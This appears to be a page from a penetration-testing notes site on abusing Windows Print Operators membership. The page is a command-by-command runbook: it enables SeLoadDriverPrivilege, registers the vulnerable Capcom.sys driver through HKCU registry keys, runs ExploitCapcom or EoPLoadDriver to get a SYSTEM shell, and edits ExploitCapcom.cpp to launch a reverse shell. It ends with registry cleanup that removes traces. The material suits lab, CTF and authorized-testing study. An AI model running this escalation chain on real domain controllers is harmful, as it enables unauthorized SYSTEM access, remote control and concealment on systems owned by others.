DiscordHackTheBoxTryHackMeGitHub

Print Operators

ABOUT

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

Capcom Driver Abuse

The plan is to use EnableSeLoadDriverPrivilege script [LINK] to enable SeLoadDriverPrivilege. Then we need to load the Capcom.sys [LINK] driver, which was used originally as a anti-cheat for Capcom games, but it also have functionality to allow any user to execute shellcode with SYSTEM privileges. Then we make a Registry key and edit it for Capcom.sys to be seen. Then we check it with DriverView [LINK]. After we verified that info, we are using ExploitCapcom script [LINK] to get SYSTEM shell.

OR we can change code of ExploitCapcom to make a reverse shell for us (if we have no GUI access).

Check privs

C:\> whoami /priv

EnableSeLoadPrivilege

C:\> .\EnableSeLoadDriverPrivilege.exe

Add Reference to Driver

You need to download Capcom.sys to C:\temp. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\temp\Capcom.sys"

C:\> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

Verify Driver

PS C:\> .\DriverView.exe /stext drivers.txt

PS C:\> cat drivers.txt | Select-String -pattern Capcom

Exploiting

PS C:\> .\ExploitCapcom.exe

Same stuff but automated

We can use EoPLoadDriver [LINK] script to automate process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver by using this command.

C:\> EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\temp\Capcom.sys
PS C:\> .\ExploitCapcom.exe

NO GUI

For that we need to find ExploitCapcom.cpp. change string below and recompile.

B E F O R E : TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

A F T E R : TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");

Cleanup

For a little clean up we could just delete registry key we made before.

C:\> reg delete HKCU\System\CurrentControlSet\Capcom
PreviousServer OperatorsNextDnsAdmins

Last updated